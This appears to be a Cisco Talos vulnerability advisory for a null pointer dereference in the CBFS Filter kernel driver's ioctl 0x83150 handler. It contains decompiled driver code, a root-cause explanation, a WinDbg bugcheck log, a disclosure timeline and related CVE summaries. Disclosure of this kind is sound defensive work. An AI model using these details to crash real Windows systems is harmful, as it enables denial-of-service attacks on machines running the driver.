    LINE75    Handle = 0i64;
    LINE76    v48 = 0i64;
    LINE77    buffer_0x10000 = 0i64;
    LINE78    v50 = 0i64;
    LINE79    CurrentStackLocation = a2->Tail.Overlay.CurrentStackLocation;
    LINE80    SystemBuffer = (struct_SystemBuffer *)a2->AssociatedIrp.SystemBuffer;
    LINE81    if ( CurrentStackLocation->Parameters.DeviceIoControl.InputBufferLength != SystemBuffer->size_len + 0x20i64 )
    LINE82    {
    LINE83      l_FileObject = 0i64;
    LINE84  invalid_param:
    LINE85      v14 = STATUS_INVALID_PARAMETER;
    LINE86      goto LABEL_68;
    LINE87    }
    LINE88    FileObject = CurrentStackLocation->FileObject;
    LINE89    must_be_1 = SystemBuffer->must_be_1;
    LINE90    if ( (must_be_1 & 1) != 0 )
    LINE91    {
    LINE92      v4 = 1;
    LINE93      v11 = 0i64;
    LINE94      v12 = 4096i64;
    LINE95    }
    LINE96    else
    LINE97    {
    LINE98      if ( (must_be_1 & 2) == 0 )
    LINE99      {
    LINE100       l_FileObject = (__int64)CurrentStackLocation->FileObject;
    LINE101       goto invalid_param;
    LINE102     }
    LINE103     v11 = 4096i64;
    LINE104     v12 = 0i64;
    LINE105   }
    LINE106   v53 = v12;
    LINE107   MaxCount.QuadPart = v11;
    LINE108   v59 = v12;
    LINE109   v52 = v11;
    LINE110   FsContext2 = (__int64)FileObject->FsContext2;
    LINE111   v58 = FsContext2;
    LINE112   v39 = *(_QWORD *)(FsContext2 + 8);
    LINE113   v54 = v39;
    LINE114   v14 = ObReferenceObjectByHandle(SystemBuffer->handle, 0, 0i64, 0, &Object, 0i64);
    LINE115   v38 = v14;
    LINE116   if ( v14 < 0 )
    LINE117   {
    LINE118     Object = 0i64;
    LINE119     v3 = 0i64;
    LINE120 LABEL_9:
    LINE121     l_FileObject = v39;
    LINE122     goto free_buffer;
    LINE123   }
    LINE124   v15 = *((_QWORD *)Object + 4);
    LINE125   v40 = v15;
    LINE126   v55 = v15;
    LINE127   a2->IoStatus.Information = 0i64;
            [...]
    LINE380   a2->IoStatus.Status = v14;
    LINE381   return (unsigned int)v14;
    LINE382 }
    

The crash is happening at LINE110, while dereferencing FileObject->FsContext2. The issue is happening as there is no null check done against FileObject and is assumed to be always valid, which is not the case if the IRP packet is sent directly. The FileObject is derived directly from CurrentStackLocation at LINE88, which is derived itself from the IRP packet at LINE79. A specially-crafted I/O request packet bypassing the checks done at LINE80 & LINE90 will lead to denial of service immediately.

**Crash Information**

    1: kd> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Bugcheck Analysis                                    *
    *                                                                             *
    *******************************************************************************
    
    SYSTEM_SERVICE_EXCEPTION (3b)
    An exception happened while executing a system service routine.
    Arguments:
    Arg1: 00000000c0000005, Exception code that caused the bugcheck
    Arg2: fffff80258bc4eb4, Address of the instruction which caused the bugcheck
    Arg3: ffff9c0ee2b66560, Address of the context record for the exception that caused the bugcheck
    Arg4: 0000000000000000, zero.
    
    Debugging Details:
    ------------------
    
    
    KEY_VALUES_STRING: 1
    
        Key  : Analysis.CPU.mSec
        Value: 2608
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 3502
    
        Key  : Analysis.Init.CPU.mSec
        Value: 32186
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 670833
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 96
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
    
    BUGCHECK_CODE:  3b
    
    BUGCHECK_P1: c0000005
    
    BUGCHECK_P2: fffff80258bc4eb4
    
    BUGCHECK_P3: ffff9c0ee2b66560
    
    BUGCHECK_P4: 0
    
    CONTEXT:  ffff9c0ee2b66560 -- (.cxr 0xffff9c0ee2b66560)
    rax=0000000000001000 rbx=0000000000000000 rcx=0000000000000000
    rdx=ffffc408362e0a10 rsi=ffffc4083492a570 rdi=0000000000000000
    rip=fffff80258bc4eb4 rsp=ffff9c0ee2b66f60 rbp=ffff9c0ee2b67150
     r8=ffffc40839fe1a30  r9=0000000000083150 r10=fffff80258ba5780
    r11=0000000000000000 r12=ffffc4083a7740c0 r13=ffffc408362e0940
    r14=ffffc40839fe1a01 r15=0000000000000000
    iopl=0         nv up ei pl nz na pe nc
    cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050302
    cbfilter20!handle_ioctl_83150+0xd0:
    fffff802`58bc4eb4 488b4308        mov     rax,qword ptr [rbx+8] ds:002b:00000000`00000008=????????????????
    Resetting default scope
    
    PROCESS_NAME:  python.exe
    
    STACK_TEXT:  
    ffff9c0e`e2b66f60 fffff802`58bbc878     : ffffc408`3492a570 ffffc408`362e0940 ffffeb80`01414701 00000000`00000000 : cbfilter20!handle_ioctl_83150+0xd0
    ffff9c0e`e2b67130 fffff802`58ba57f3     : c40839fe`00000000 ffffc408`362e0940 00000000`00000001 ffffc408`3492a570 : cbfilter20!DispatchDeviceControl+0x2d4
    ffff9c0e`e2b67160 fffff802`5509b7d5     : 00000000`0000000e 00000000`00000000 ffffc408`362e0940 00000000`00000001 : cbfilter20!fn_IRP_MJ_DEVICE_CONTROL+0x73
    ffff9c0e`e2b671c0 fffff802`55481a08     : ffff9c0e`e2b67540 ffffc408`362e0940 00000000`00000001 ffffc408`3ad7e0c0 : nt!IofCallDriver+0x55
    ffff9c0e`e2b67200 fffff802`554812d5     : 00000000`00083150 ffff9c0e`e2b67540 00000000`00000005 ffff9c0e`e2b67540 : nt!IopSynchronousServiceTail+0x1a8
    ffff9c0e`e2b672a0 fffff802`55480cd6     : 00007ff8`86a68e80 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x5e5
    ffff9c0e`e2b673e0 fffff802`55214ab5     : 00000000`00000000 00000000`00000000 00000000`00000000 000000e2`7d7ecb18 : nt!NtDeviceIoControlFile+0x56
    ffff9c0e`e2b67450 00007ff8`c726ce54     : 00007ff8`c4aab04b ffffffff`ff9c9830 00000000`00000000 000000e2`7d7eeb48 : nt!KiSystemServiceCopyEnd+0x25
    000000e2`7d7eea78 00007ff8`c4aab04b     : ffffffff`ff9c9830 00000000`00000000 000000e2`7d7eeb48 000000e2`7d7eec40 : ntdll!NtDeviceIoControlFile+0x14
    000000e2`7d7eea80 00007ff8`c6a05611     : 00000000`00083150 000000e2`7d7eec40 00000236`fb968d00 00007ff8`86b0694d : KERNELBASE!DeviceIoControl+0x6b
    000000e2`7d7eeaf0 00007ff8`86a4648c     : 00000000`00000022 000000e2`7d7eec40 000000e2`7d7eec40 00000000`00000001 : KERNEL32!DeviceIoControlImplementation+0x81
    000000e2`7d7eeb40 00000000`00000022     : 000000e2`7d7eec40 000000e2`7d7eec40 00000000`00000001 00000000`00000000 : win32file!PyInit_win32file+0xf98c
    000000e2`7d7eeb48 000000e2`7d7eec40     : 000000e2`7d7eec40 00000000`00000001 00000000`00000000 000000e2`00000000 : 0x22
    000000e2`7d7eeb50 000000e2`7d7eec40     : 00000000`00000001 00000000`00000000 000000e2`00000000 000000e2`7d7eeba0 : 0x000000e2`7d7eec40
    000000e2`7d7eeb58 00000000`00000001     : 00000000`00000000 000000e2`00000000 000000e2`7d7eeba0 00000000`00000000 : 0x000000e2`7d7eec40
    000000e2`7d7eeb60 00000000`00000000     : 000000e2`00000000 000000e2`7d7eeba0 00000000`00000000 000000e2`7d7eeba8 : 0x1
    
    
    SYMBOL_NAME:  cbfilter20!handle_ioctl_83150+d0
    
    MODULE_NAME: cbfilter20
    
    IMAGE_NAME:  cbfilter20.sys
    
    STACK_COMMAND:  .cxr 0xffff9c0ee2b66560 ; kb
    
    BUCKET_ID_FUNC_OFFSET:  d0
    
    FAILURE_BUCKET_ID:  0x3B_c0000005_cbfilter20!handle_ioctl_83150
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    FAILURE_ID_HASH:  {2a1744df-b799-38ae-0bd4-b13f23c537e7}
    
    Followup:     MachineOwner
    ---------
    

**TIMELINE**

2022-11-04 - Vendor Disclosure  
2022-11-04 - Initial Vendor Contact  
2022-11-22 - Public Release

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-43588: TALOS-2022-1647 || Cisco Talos Intelligence Group

A null pointer dereference vulnerability exists in the handle_ioctl_0x830a0_systembuffer functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

CVE-2022-43590: TALOS-2022-1649 || Cisco Talos Intelligence Group

A null pointer dereference vulnerability exists in the handle_ioctl_8314C functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.

Tag

#mac